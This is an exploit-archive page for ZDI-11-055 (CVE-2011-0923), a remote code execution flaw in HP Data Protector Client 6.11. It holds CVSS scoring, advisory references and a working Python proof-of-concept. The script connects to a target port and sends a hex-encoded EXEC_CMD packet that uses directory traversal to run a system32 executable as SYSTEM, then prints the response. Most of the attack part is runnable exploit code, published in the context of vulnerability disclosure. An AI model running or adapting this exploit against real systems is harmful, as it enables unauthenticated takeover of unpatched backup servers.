HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)

2011.05.30
Credit: fdisk
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability PoC (ZDI-11-055) # Date: 2011-05-28 # Coded by: fdisk # Version: 6.11 # Tested on: Windows 2003 Server SP2 en # CVE: CVE-2011-0923 # Notes: ZDI-11-055 # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/ # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143 # # Special thanks to all the Exploit-DB Dev Team. import socket import sys if len(sys.argv) != 3: print "Usage: ./ZDI-11-055.py <Target IP> <Port>" sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) payload = ( "\x00\x00\x00\xa4\x20\x32\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75" "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x66\x64\x69" "\x73\x6b\x79\x6f\x75\x00\x20\x43\x00\x20\x32\x30\x00\x20\x66\x64" "\x69\x73\x6b\x79\x6f\x75\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41" "\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48" "\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49" "\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f" "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" "\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x5c\x77\x69\x6e\x64\x6f\x77\x73" "\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x69\x70\x63\x6f\x6e\x66" "\x69\x67\x2e\x65\x78\x65\x00\x00") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) while 1: data = s.recv(4096) if data: print data else: break s.close()

References:

http://zerodayinitiative.com/advisories/ZDI-11-055/
http://www.vupen.com/english/advisories/2011/0308
http://www.securityfocus.com/bid/46234
http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-hp


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top